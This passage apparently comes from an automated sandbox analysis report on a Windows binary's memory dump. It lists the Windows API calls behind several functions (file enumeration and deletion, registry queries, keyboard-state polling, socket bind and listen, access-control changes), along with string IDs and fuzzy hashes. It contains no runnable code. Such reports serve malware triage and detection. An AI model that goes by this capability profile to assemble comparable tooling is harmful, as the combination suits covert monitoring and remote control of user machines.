                                                    • FindClose.KERNEL32(00000000), ref: 0042F29C
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F2B8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F308
                                                    • SetCurrentDirectoryW.KERNEL32(0047A5A0), ref: 0042F326
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F330
                                                    • FindClose.KERNEL32(00000000), ref: 0042F33D
                                                    • FindClose.KERNEL32(00000000), ref: 0042F34F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 38bb13f296d2d75c7e60d7128eb84932166300298c033bbdbb48db7523b947f0
                                                    • Instruction ID: e90f4d91cea36719b5217bf317e0fb1994b7732cf3e7d8013bbe0f8f80b949e2
                                                    • Opcode Fuzzy Hash: 38bb13f296d2d75c7e60d7128eb84932166300298c033bbdbb48db7523b947f0
                                                    • Instruction Fuzzy Hash: 9B31C3766011287ADB10DBB0FC48EDF77BCEB4A361F9041B7F804D2090DA39DA498B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa=$PJF$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-651847768
                                                    • Opcode ID: 35717303aae0deb0ddc003f50536b68e4428757cacaafa4ecafd69d2c149d5da
                                                    • Instruction ID: a19dd64b2fdb76d972ec1ed79768dabc524cf47716543ae7e766f67deff17718
                                                    • Opcode Fuzzy Hash: 35717303aae0deb0ddc003f50536b68e4428757cacaafa4ecafd69d2c149d5da
                                                    • Instruction Fuzzy Hash: DD72B2B6E002199BDB25CF68E841BEEB7B5FF44310F24816BE519EB390D7349981CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                      • Part of subcall function 0041874A: GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                      • Part of subcall function 0041874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                      • Part of subcall function 0041874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                      • Part of subcall function 004187E7: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0041843D,?), ref: 004187F3
                                                      • Part of subcall function 004187E7: HeapAlloc.KERNEL32(00000000,?,?,?,0041843D,?), ref: 004187FA
                                                      • Part of subcall function 004187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,?,?,?,?,0041843D,?), ref: 0041880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,000F01FF,?,?,00000000,00000000,00000000,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 0041825B
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,?,?,?,?,?,?,?,?,?,004189C8), ref: 0041828F
                                                    • GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 004182A0
                                                    • GetAce.ADVAPI32(?,00000000,00000400,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000), ref: 004182DD
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000400,?), ref: 004182F9
                                                    • GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 00418316
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?), ref: 00418325
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 0041832C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000), ref: 0041834D
                                                    • CopySid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8,00000000,?,00000400), ref: 00418354
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00418385
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004189C8), ref: 004183AB
                                                    • SetUserObjectSecurity.USER32 ref: 004183BF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1795222879-0
                                                    • Opcode ID: 69dd075ab406b645077ceb36d07da47048181deec2292b0eb90d093ddc5d84ff
                                                    • Instruction ID: cef3ebe969771be793faef5fe71dfa60d3755a554138fc7b781b392dc81443ab
                                                    • Opcode Fuzzy Hash: 69dd075ab406b645077ceb36d07da47048181deec2292b0eb90d093ddc5d84ff
                                                    • Instruction Fuzzy Hash: 89617A75900109AFDF04DFA0DC45EEEBBB8FF45704F04852EF821A6291DB3A9A55CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74B061D0,?,00000000), ref: 0042F37E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042F3D9
                                                    • FindClose.KERNEL32(00000000), ref: 0042F3E4
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F400
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F450
                                                    • SetCurrentDirectoryW.KERNEL32(0047A5A0), ref: 0042F46E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F478
                                                    • FindClose.KERNEL32(00000000), ref: 0042F485
                                                    • FindClose.KERNEL32(00000000), ref: 0042F497
                                                      • Part of subcall function 004245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74B5F8A0,00000000,00000000,?,0042F3C6,?), ref: 004245DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 9791e495a929e18695b96bfacf3d966cdf42677b1b1683e62ee9cb13ba92727e
                                                    • Instruction ID: f25251dc56f0a7d39981cd0706150d0b54d079f1be5a3d185928ed3156893e99
                                                    • Opcode Fuzzy Hash: 9791e495a929e18695b96bfacf3d966cdf42677b1b1683e62ee9cb13ba92727e
                                                    • Instruction Fuzzy Hash: AB3106722015296EDB10EBA0FC88ADF777CDF49365F900177E80092190D779DA48CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440737
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004407D6
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0044086E
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00440AAD
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440ABA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                                    • String ID:
                                                    • API String ID: 1724414362-0
                                                    • Opcode ID: 755ef06ec4a9110d08dffd90c4f1c7cd72be55ce49abe804ebaa0439ddeaa2d1
                                                    • Instruction ID: 43d886dab9b0ab83a317475e5fd3ebd35283b5d0f7fef73c2de98d664a20fd00
                                                    • Opcode Fuzzy Hash: 755ef06ec4a9110d08dffd90c4f1c7cd72be55ce49abe804ebaa0439ddeaa2d1
                                                    • Instruction Fuzzy Hash: 08E17D31204310AFDB15DF25C884E2BBBE8EF89714B04896EF54ADB262DB34ED15CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?,?,?), ref: 00420241
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004202C2
                                                    • GetKeyState.USER32(000000A0), ref: 004202DD
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004202F7
                                                    • GetKeyState.USER32(000000A1), ref: 0042030C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00420324
                                                    • GetKeyState.USER32(00000011), ref: 00420336
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0042034E
                                                    • GetKeyState.USER32(00000012), ref: 00420360
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00420378
                                                    • GetKeyState.USER32(0000005B), ref: 0042038A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a0f64a5a66eda95efad4f80b9e757c37031f0c555c77c8c192742392a7551c0b
                                                    • Instruction ID: db03ad31f4edfaabef3f826b3969f9c1265a830c6307ee658c8e32ef25324f7e
                                                    • Opcode Fuzzy Hash: a0f64a5a66eda95efad4f80b9e757c37031f0c555c77c8c192742392a7551c0b
                                                    • Instruction Fuzzy Hash: 484189347047D9AEFF318760A8087A7BEE0AB12344F84409BD9C5566C3D7A95DC887B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042C9F8
                                                    • FindClose.KERNEL32(00000000), ref: 0042CA4C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042CA71
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042CA88
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042CAAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileTime$FindLocal$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3238362701-2428617273
                                                    • Opcode ID: 8f1f2293bdbc450b9f6f93a48961c00f8ce83f40112c99a7f4ea24193e87706e
                                                    • Instruction ID: 122a44d8b13851c5cdcd5daa9441e8507ca6f991cbe620731f141d64702f28ae
                                                    • Opcode Fuzzy Hash: 8f1f2293bdbc450b9f6f93a48961c00f8ce83f40112c99a7f4ea24193e87706e
                                                    • Instruction Fuzzy Hash: 8FA12FB6508354ABC701EB55C885EAFB7ECAF94700F40492EB585CB191EB74EE08CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0wG$DEFINE$Oa=$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                    • API String ID: 0-2749369646
                                                    • Opcode ID: 069ccd89eb5e2f9dea4346e66749663c0d63829cb36772792d56478798229329
                                                    • Instruction ID: 0d3fcc727cdcb2aee43713306038a066e1982ac92c8914dbd01a816fe316c254
                                                    • Opcode Fuzzy Hash: 069ccd89eb5e2f9dea4346e66749663c0d63829cb36772792d56478798229329
                                                    • Instruction Fuzzy Hash: 6193AE72A042199FDB24CF98D981AEDB7B1FF48310F25816BE945EB380E7749E81CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 00424CD3: GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    • FindFirstFileW.KERNEL32(?,?,00000003,?,?), ref: 00423ADF
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00423B87
                                                    • MoveFileW.KERNEL32(?,?), ref: 00423B9A
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00423BB7
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423BD9
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00423BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: b010233bacc9f7e2ffcfc257f6d27651a7b3302167502841751ef8512d4102ea
                                                    • Instruction ID: f4e5eeb38e9ce78b285971a0cae083b96a096d1bf68519504f276765bbd00555
                                                    • Opcode Fuzzy Hash: b010233bacc9f7e2ffcfc257f6d27651a7b3302167502841751ef8512d4102ea
                                                    • Instruction Fuzzy Hash: B151803190115C9ACB06EFA1ED92DEEB778AF15301F6441AAF441BA092DF296F0DCB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004365EF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004365FE
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 0043661A
                                                    • listen.WSOCK32(00000000,00000005), ref: 00436629
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436643
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00436657
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 316ecb33b7d99a4efa1522346fef756311a3f1997a4aa919219d14be4611985f
                                                    • Instruction ID: a7965cace6a1f5721eb44488b40a8be93a9c56d64623fbb4bf7e52f8eb9ef707
                                                    • Opcode Fuzzy Hash: 316ecb33b7d99a4efa1522346fef756311a3f1997a4aa919219d14be4611985f
                                                    • Instruction Fuzzy Hash: CF21C534200201AFCB00AF24C849F6EB7A9EF49310F12816EE916EB3D1CB74AD058B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0042F6AB
                                                    • Sleep.KERNEL32(0000000A), ref: 0042F6DB
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0042F7A8
                                                    • FindClose.KERNEL32(00000000), ref: 0042F7BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep
                                                    • String ID: *.*
                                                    • API String ID: 1749430636-438819550
                                                    • Opcode ID: 3df32bfa0565d27698363afa3f661226c17d699b780752e1b4f99ab0b206c5ad
                                                    • Instruction ID: aa7c2bddb959a731101f2135e6c16ecc9bdbef771e01fe499fefd7fc69e93f74
                                                    • Opcode Fuzzy Hash: 3df32bfa0565d27698363afa3f661226c17d699b780752e1b4f99ab0b206c5ad
                                                    • Instruction Fuzzy Hash: 24418F75A0021A9FDB11DF60DC85EEE7BB4FF05310F94457AE814A6290DB349E48CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C19FA
                                                    • GetSysColor.USER32(0000000F), ref: 003C1A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 003C1A61
                                                      • Part of subcall function 003C1290: DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 0b8ad611f67e694a8bb7215c51b1e2574a407bff9b7badf5f4cc883b39d2fd0e
                                                    • Instruction ID: 742037d6057a5fed894b202c108404219d17ff1789be82ab8ee9f94c2d1f78cd
                                                    • Opcode Fuzzy Hash: 0b8ad611f67e694a8bb7215c51b1e2574a407bff9b7badf5f4cc883b39d2fd0e
                                                    • Instruction Fuzzy Hash: 73A177B4102448BAEA2BAB2A8C84F7F659CDB43385F16051EF503D6593CF28DC01B3B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
                                                    • _strlen.LIBCMT ref: 003F4251
                                                    • _strlen.LIBCMT ref: 003F4276
                                                      • Part of subcall function 003E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FA9
                                                      • Part of subcall function 003E2F95: GetLastError.KERNEL32(00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FBB
                                                    • GetTimeZoneInformation.KERNEL32(00484AF8,?,?,?,?,?,0047C070,00000030), ref: 003F42B9
                                                    • WideCharToMultiByte.KERNEL32(?,?,00484AFC,000000FF,?,0000003F,?,?), ref: 003F4332
                                                    • WideCharToMultiByte.KERNEL32(?,?,00484B50,000000FF,FFFFFFFE,0000003F,?,?,?,00484AFC,000000FF,?,0000003F,?,?), ref: 003F436B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                    • String ID:
                                                    • API String ID: 3691860299-0
                                                    • Opcode ID: 5d1fe8a4635e128a74f0c8e82f32975619c06a746b04d3f1dc2f336c7de6c2a3
                                                    • Instruction ID: 24089e51a9c7d535c84201004b44565e1f28e5c83f424140204f39134c7a069d
                                                    • Opcode Fuzzy Hash: 5d1fe8a4635e128a74f0c8e82f32975619c06a746b04d3f1dc2f336c7de6c2a3
                                                    • Instruction Fuzzy Hash: 99A1A071C0024DAEDF169FA9D881BBEBBB8BF45710F15052AF210BB2A1DB748D41CB24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00436AB1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436ADA
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00436B13
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436B20
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00436B34
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 3fb8e684e4c8bb742b288a6ef007117fbf085aa73725d1216db3230eec82aea4
                                                    • Instruction ID: 70a0f61e0369552631f868ed62cd612611f7b289ef8b693fd037ad9910c85528
                                                    • Opcode Fuzzy Hash: 3fb8e684e4c8bb742b288a6ef007117fbf085aa73725d1216db3230eec82aea4
                                                    • Instruction Fuzzy Hash: 2241B375600610AFEB11BF24DC86F6E77A89B09720F06805EF91AEF3C2DB74AD018795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 99d5c000b723a9cabbe1cb7ed41102a0923a35afc3808caa3c13a2511be507f0
                                                    • Instruction ID: 06480aa859dace297aadbd9c49872a12b6c47d86634187722f97a5a3f472233f
                                                    • Opcode Fuzzy Hash: 99d5c000b723a9cabbe1cb7ed41102a0923a35afc3808caa3c13a2511be507f0
                                                    • Instruction Fuzzy Hash: 3911B2353009106FEB212F26DC45B2FB798EF55721B42403AF80AD7252CB78AD028AAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0042C69D
                                                    • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042C6B5
                                                    • CoUninitialize.OLE32 ref: 0042C922
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 948891078-24824748
                                                    • Opcode ID: 492f421c26c72c69a0a7d29f5362980467348a6aa76f7d55a0fbe01aa1448681
                                                    • Instruction ID: 2a3195b49012d5feb0efd8e9944eb0a099b25d3129191f3e0e7319732f44a05d
                                                    • Opcode Fuzzy Hash: 492f421c26c72c69a0a7d29f5362980467348a6aa76f7d55a0fbe01aa1448681
                                                    • Instruction Fuzzy Hash: 72A11871108205AFD301EF54C885FABB7E8EF95704F00496DF556DB1A2EB70AE49CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
